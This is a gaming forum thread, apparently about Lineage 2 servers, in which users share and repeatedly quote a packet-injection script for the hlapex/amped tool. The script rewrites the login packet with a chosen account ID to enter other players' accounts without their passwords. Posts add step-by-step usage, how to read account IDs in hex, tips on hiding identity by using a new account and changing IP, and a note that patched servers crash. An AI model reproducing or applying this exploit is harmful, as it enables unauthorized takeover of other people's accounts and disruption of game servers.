Jump to content

Recommended Posts

Posted

A new xploit is avaible and allow an user to join to any account without know the user and password, you only need to know the account id.

 

this is the code that allows that with hlapex

 

you only change account with id you want to try

 

const
account=1;
procedure Init;
begin
end;
procedure Free;
begin
end;
begin
if FromServer then exit;
if pck[1]=#$08 then
begin
buf:=#$08;
WriteS('');
WriteD(account);
WriteD(0);
pck:=buf;
end;
end.

Posted

A new xploit is avaible and allow an user to join to any account without know the user and password, you only need to know the account id.

 

this is the code that allows that with amped

 

you only change account with id you want to try

 

const
account=1;
procedure Init;
begin
end;
procedure Free;
begin
end;
begin
if FromServer then exit;
if pck[1]=#$08 then
begin
buf:=#$08;
WriteS('');
WriteD(account);
WriteD(0);
pck:=buf;
end;
end.

 

at last someone has released it! nice share.

Sticky.

 

@dublin555: Yes you need hlapex,send this code when you see the character menu, before login.

Posted

A new xploit is avaible and allow an user to join to any account without know the user and password, you only need to know the account id.

 

this is the code that allows that with amped

 

you only change account with id you want to try

 

const
account=1;
procedure Init;
begin
end;
procedure Free;
begin
end;
begin
if FromServer then exit;
if pck[1]=#$08 then
begin
buf:=#$08;
WriteS('');
WriteD(account);
WriteD(0);
pck:=buf;
end;
end.

 

at last someone has released it! nice share.

Sticky.

 

@dublin555: Yes you need hlapex,send this code when you see the character menu, before login.

Not when you see character menu, that dont work, with this code you only need to do the next:

 

1. Execute Hlapex

2. Load that code

3. Execute L2

4. Log with any account you have

 

And woala, you would see the characters from that account

 

if you send the packet 08 after see the character selection screen it wouldnt work

 

Some servers have it fixed, but most of them not, dead to noobs admins.

 

Some servers use the fix of change the id of the accounts, 99% of them use the script like has been shared, you know the new ids (-beep-1ng n00bs admins).

 

For those who change the range to another one, when you log you get your account id in hex format

 

RequestAuthLogin

LoginName: accountname

PlayKey2: F8020000 <--- This is the account id

PlayKey1: 0C000000

LoginKey1: F8020000 <--- This is the account id

LoginKey2: EB655315

Posted

if pck[1]=#$08 then - here i need change 1 for accout ID?

 

dam, f:ck1ng noob cheaters

 

here --> account=1;

 

I forgot to say most of the server where is fixed each time someone try to use it the server crash!

Posted

Not when you see character menu, that dont work, with this code you only need to do the next:

 

1. Execute Hlapex

2. Load that code

3. Execute L2

4. Log with any account you have

 

And woala, you would see the characters from that account

 

 

scripts makes life easier!

Posted

so i make a script with this and all i do is to send this script with hlapex??and if so where do i pute the id with which i want to login?could any1 make ay sort video so that simple ppl can gbet it too;)

Posted

Thanks for releasing someth usefull again .. been waiting for a while ;)

 

Well.. i have no exp with syntax's used in that script , but when i try to use it with hlapex i get the message that 'buf:' isn't declared.

So how do i declare this .. or what can i do about this to fix it?

 

And for MewMew , i guess u change "account" by ur ID u want to try. > WriteD(account);

Posted

its a bit complicated or i didnt catch it.

ok u load the script, u load apex ,u load l2.

here is my first question:

what do u mean by :log with any account u have???

if i am right u mean that u use your account name to login???

then what?? u run the script and........???

and by the way could someone specify which id code u should change.i think its some code from the script but which one???

Posted

Here it is:

 

const
account=Here you put the id you wish to login to;
procedure Init;
begin
end;
procedure Free;
begin
end;
begin
if FromServer then exit;
if pck[1]=#$08 then
begin
buf:=#$08;
WriteS('');
WriteD(account);
WriteD(0);
pck:=buf;
end;
end.

 

You put the script in the scripts folder (open a script, edit it, and save it with a different name)

Open hlapex.exe

Now run l2.exe

When you get to the login screen ~>

Go to scripts tab, press load, select the script you just saved. Press CALL INIT. In hlapex of course...

Now login with one of your accounts (just make a new one, and change your ip before doing it, if you have a main account there :P)

If you login normally till the chars window, it is OK!!!!! YOU OWNED THEM!!!

If not, when you press the selection of the server, you will simply get disconnected or you will crash the server (if they have that old noobish fix :P)

 

Just have fun.... Oh, i had heard of this a loooong time ago, and many servers (mostly russians) got owned :P It is fixed like 99% (only some servers that their admin doesn't even know what does amped mean have this till working...)

 

FOR SOME NEWBIES, IT IS FOR OFFICIAL SERVERS, NOT FOR JAVA ONEEEEEEEEEEEEEEEEEEES (C4, if you don't get that way, not C5).

Guest
This topic is now closed to further replies.

×
×
  • Create New...